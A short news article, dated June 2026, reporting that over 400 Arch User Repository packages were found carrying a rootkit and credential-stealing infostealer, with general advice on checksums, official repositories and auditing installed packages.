What happened in the Arch Linux repository?

Over 400 packages in Arch User Repository (AUR) were found to contain malware, including a rootkit and infostealer. These programs steal user credentials and access tokens on Linux systems.

Users installing packages from AUR without verifying their security are at risk. Those relying on untrusted sources or ignoring security warnings are particularly vulnerable.

How can I protect myself from such threats?

Install packages only from official repositories, verify checksums, and use antivirus software. Keep your system updated and avoid suspicious sources to minimize risks.

← All news

Security

Hundreds of Malicious Packages with Rootkit Found in Arch Linux Repository

June 12, 2026

Photo: BleepingComputer

Quick answer

More than 400 infected packages with a rootkit and infostealer have been discovered in Arch User Repository (AUR), targeting Linux users to steal credentials and access tokens.

Cybersecurity experts have uncovered a large-scale campaign distributing malware in the Arch User Repository (AUR). Attackers embedded a rootkit and infostealer in over 400 packages, designed to steal credentials and access tokens from Linux users. The threat primarily impacts those who frequently use unofficial sources for software installation.

Security researchers note that the attack succeeded due to the lack of strict moderation in AUR. Unlike official repositories, where packages undergo rigorous checks, AUR allows any user to upload code, creating an environment ripe for malware distribution.

The malicious packages were disguised as legitimate applications, making detection difficult. The infostealer harvested data from browsers, messengers, and other applications, while the rootkit ensured covert execution of malicious code with superuser privileges. Experts advise users to verify package checksums and deploy antivirus solutions for Linux.

Arch Linux developers have already removed the infected packages from the repository, but the threat may persist for users who previously installed the malware. It is recommended to audit installed packages and consider a system reinstall if necessary.

Common questions

What happened in the Arch Linux repository?: Over 400 packages in Arch User Repository (AUR) were found to contain malware, including a rootkit and infostealer. These programs steal user credentials and access tokens on Linux systems.
Who is at risk?: Users installing packages from AUR without verifying their security are at risk. Those relying on untrusted sources or ignoring security warnings are particularly vulnerable.
How can I protect myself from such threats?: Install packages only from official repositories, verify checksums, and use antivirus software. Keep your system updated and avoid suspicious sources to minimize risks.

Dzen feed: /feed/dzen.xml · RSS: /feed.xml